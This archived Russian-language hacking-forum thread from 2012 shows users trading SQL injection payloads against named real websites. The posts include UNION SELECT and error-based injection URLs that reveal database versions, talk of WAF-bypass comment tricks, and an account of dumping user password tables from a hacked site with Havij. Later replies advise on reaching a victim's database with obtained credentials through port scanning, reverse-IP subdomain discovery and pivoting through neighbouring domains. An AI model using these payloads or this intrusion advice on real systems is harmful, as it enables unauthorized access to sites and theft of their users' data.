ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.04.2012, 14:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
183267
Репутация:
84
|
|
Сообщение от None
http://www.sin-bad.ru/main.php?f=-10+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16+--+
не могу найти куда выводит =/
|
|
|
|
14.04.2012, 15:38
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от shadowrun
shadowrun said:
не могу найти куда выводит =/
http://www.sin-bad.ru/main.php?f=10+UnIoN+sElEcT+1,2,3,4,5,6,7,8,9,10,ve rsion(),12,13,14,15,16--+f
В самом низу
4.0.27-log
|
|
|
14.04.2012, 16:01
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от kingbeef
kingbeef said:
http://www.radimpex.rs/download.php?id=-1/*|UnIoN*//*|aLl*//*|SeLeCt*/1--&lang=en
Это прикол, да?
Что за палки перед операторами?
С чего ты взял, что там фильтр какой-то?
Извините, конечно, но это *facepalm*.
http://www.radimpex.rs/download.php?id=1 and(substring(version(),1,1)=3)&lang=en
Там просто мускул 3ей ветки =\
http://www.radimpex.rs/download.php?id=1 or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1 -- -&lang=en
Duplicate entry ' 3.23.581' for key 1
|
|
|
|
14.04.2012, 16:11
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от Tigger
Tigger said:
Это прикол, да?
Что за палки перед операторами?
Гуглил "WAF Bypass" ,нашел видео и по нему делал с "палками"
Сообщение от None
Там просто мускул 3ей ветки =\
Спасибо
|
|
|
|
14.04.2012, 16:21
|
|
Участник форума
Регистрация: 08.01.2010
Сообщений: 155
Провел на форуме:
1008872
Репутация:
22
|
|
возникла проблема с выводом приватной информации с похеканного сайта. некоторую информацию выводит нормально, но как только прописываю таблицы с паролями юзеров, сразу перекидывает на главную страницу сайта (и там пропечатывается мой код запроса в каком-нибудь поле). попытался вставить сайт в прогу Havij. она загрузила таблицы и поля. я взял загрузить то поле, которое было с паролями юзеров. но вылезло "Turning off 'bypass illegal union' and retrying". скажите, в чем проблема? я думаю, что нужны права админа. доступ к админке сайта есть
|
|
|
|
14.04.2012, 16:39
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
skagen
Кодировка.
Попробуй:
SELECT unhex(hex(version())) FROM ...
Либо другие варианты, описанные в статьях.
|
|
|
|
14.04.2012, 19:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
такой вопрос, есть логин и пароль от БД, phpmyadmin нету, в строке host стоит знак % тоесть можно подключатся к с любого ипа, но проблема в том что нет открытого 3306 порта. както можно ещо иначе подключится или безнадёжно?
|
|
|
|
14.04.2012, 19:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
142623
Репутация:
19
|
|
Сообщение от qaz
qaz said:
такой вопрос, есть логин и пароль от БД, phpmyadmin нету, в строке host стоит знак % тоесть можно подключатся к с любого ипа, но проблема в том что нет открытого 3306 порта. както можно ещо иначе подключится или безнадёжно?
Проскань порты мб на другом висит.
Но мускуль очень редко смотрит наружу.
|
|
|
|
14.04.2012, 19:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от mironich
mironich said:
Проскань порты мб на другом висит.
Но мускуль очень редко смотрит наружу.
та сканил, всё что есть
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]Discovered open port 25[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp
Discovered open port 110[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp
Discovered open port 80[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp
Discovered open port 53[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp
Discovered open port 443[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp[/COLOR][/COLOR]
|
|
|
|
14.04.2012, 23:17
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от qaz
qaz said:
та сканил, всё что есть
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]Discovered open port 25[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp
Discovered open port 110[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp
Discovered open port 80[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp
Discovered open port 53[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp
Discovered open port 443[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp[/COLOR][/COLOR]
Это не все что есть. Если сайт того стоит - потрать время , потрудись и проскань как можно большее количество портов. Изучи ответ сервера по каждому порту, а не смотри в дамп проги чем ты там сканишь. К тому-же, посмотри в конфигах и реверс IP какие субдомены имеются. Частенько делают базовый домен на который прекрывают порты а к примеру mysql.site.ru открыт для подключения. Опять -же, через реверс IP пробей может зальешься на смежные домены, тогда локально подключишься.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
